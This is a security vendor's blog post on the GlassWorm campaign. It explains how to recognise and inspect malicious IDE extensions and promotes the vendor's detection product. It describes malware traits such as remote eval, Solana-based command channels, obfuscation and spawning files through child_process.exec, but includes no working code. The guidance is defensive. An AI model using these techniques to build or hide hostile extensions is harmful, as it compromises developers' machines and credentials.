Cross icon
Test your LLM for oversharing!  Test for real-world oversharing risks with role-specific prompts that mimic  real workplace questions. FREE - Start Now
protect icon

A new era requires a new set of solutions
Knostic delivers it

Skip to main content
Skip to main content

Practical methods to identify, inspect, and defend against compromised IDE extensions that turn developer tools into an attack vector

GlassWorm shows how developer tools have become part of the attack surface. The same IDEs and coding assistants that boost productivity can also be used to deliver malware. Compromised extensions now run code on developer machines, steal credentials, and feed infections back into the supply chain. Here’s how to recognize and analyze them before they do damage.

Recognizing Malicious Behavior

Certain patterns appear repeatedly in malicious extensions. Dynamic code execution, such as calls to eval() that run remote data, is an immediate warning sign. Extensions with no clear purpose that only fetch, decode, and execute code should be treated as suspect.

Some campaigns hide their communication through the Solana blockchain, using it as a covert command channel. Others rely on obfuscation with meaningless variable names like etptqzkror or vldvs, heavy Base64 encoding, and string manipulation that conceals payloads. Several create and run new files such as run.js using Node’s child_process.exec.

When these signs appear together, you are likely not dealing with sloppy programming but with malware. Even a simple theme can conceal a loader that downloads a second-stage payload.

Examining a VSIX Extension

A .vsix file is just a ZIP archive. Rename it from .vsix to .zip, extract it, and open it. Inside you’ll find folders like src or dist, and files such as extension.js or extension.ts.

Start with package.json. It lists commands, permissions, and activation events. Unexpected triggers or remote network calls indicate trouble. Next, review the JavaScript files for encoded strings, URLs, or any process execution commands.

If you prefer a faster method, use a VSIX viewer extension in VS Code. It lets you open and inspect the contents directly.

Strengthening IDE Security

Your IDE should be treated as a critical system. Only install extensions from verified publishers. Review updates, especially when a long-inactive project suddenly releases a new version. Run untrusted code in isolated environments and monitor for unusual network activity.

Kirin by Knostic detects infected extensions at installation time. It alerts the user instantly and blocks the threat before it spreads through the environment.

Developer workstations and coding assistants now hold privileged access to code, tokens, and infrastructure. Understanding how to inspect and validate extensions is basic operational security.

To see how Knostic protects enterprises, developers, and AI coding agents from attacks like GlassWorm, visit https://www.knostic.ai/ai-coding-security-solution-kirin.

bg-shape-download

See How to Secure and Enable AI in Your Enterprise

Knostic provides AI-native security and governance across copilots, agents, and enterprise data. Discover risks, enforce guardrails, and enable innovation without compromise.

195 1-min
background for career

What’s next?

Want to solve oversharing in your enterprise AI search? Let's talk.

Knostic offers the most comprehensively holistic and impartial solution for enterprise AI search.

protect icon

Knostic leads the unbiased need-to-know based access controls space, enabling enterprises to safely adopt AI.